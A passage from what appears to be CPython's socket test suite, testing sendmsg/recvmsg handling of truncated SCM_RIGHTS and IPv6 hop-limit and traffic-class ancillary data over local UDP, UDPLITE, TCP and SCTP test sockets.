self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
